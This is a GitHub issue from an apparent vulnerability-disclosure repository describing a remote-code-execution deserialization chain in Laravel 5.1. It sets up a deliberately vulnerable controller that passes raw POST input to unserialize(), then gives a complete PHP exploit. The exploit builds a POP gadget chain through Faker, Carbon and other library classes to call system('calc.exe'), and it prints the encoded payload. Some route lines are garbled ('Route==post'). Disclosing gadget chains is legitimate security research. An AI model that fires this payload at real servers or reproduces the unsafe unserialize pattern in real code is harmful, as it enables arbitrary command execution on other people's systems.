search

beicheng-maker / vulns

5 stars 0 forks source link

Laravel deUnserialize RCE #5

Closed beicheng-maker closed 2 years ago

beicheng-maker commented 2 years ago

Laravel5.1 POP4 RCE

composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*" app/Http/Controllers/UsersController.php adding a controller UsersController

<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
class UsersController extends Controller
{

    /**

     * 创建一个新用户。

     *

     * @param  Request  $request

     * @return Response

     */
    public function store(Request $request)
    {  
        echo "Please post cmd to unserialize";

        $payload=$request->input("cmd");

        unserialize($payload);
        //
    }
}
?>

routes/web.php Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);

<?php
use Illuminate\Support\Facades\Route;
/*
|--------------------------------------------------------------------------

| Web Routes

|--------------------------------------------------------------------------

|

| Here is where you can register web routes for your application. These

| routes are loaded by the RouteServiceProvider within a group which

| contains the "web" middleware group. Now create something great!

|

*/

Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);

exp

<?php
namespace Faker;
class DefaultGenerator{
    public $default;

}
namespace Carbon;
class Carbon{}

namespace Faker;
class Generator{
    protected $formatters = [];
    public function __construct(){
        $this->formatters['huahua']='system';
    }
}

namespace Carbon;
use Carbon\Carbon;
use Faker\DefaultGenerator;
use Faker\Generator;
class CarbonPeriod{
    protected $current;
    protected $dateClass;
    protected $filters = [];
    protected $key;
    public function __construct(){
        $this->dateClass=new DefaultGenerator;
        $this->dateClass->default=new DefaultGenerator;
        $this->dateClass->default->default='huahua';
        $this->current=new Carbon;
        $this->filters[][]=[new Generator,'format'];
        $this->key=array("calc.exe");
    }
}

namespace Illuminate\View;
use Carbon\CarbonPeriod;
class InvokableComponentVariable{
    protected $callable=[];
    public function __construct(){
        $this->callable=[new CarbonPeriod,'valid'];
    }
}
namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
    private $arrays = [];
    public function __construct(){
        $this->arrays=new InvokableComponentVariable;
    }
}
echo urlencode(serialize(new Context));
?>

image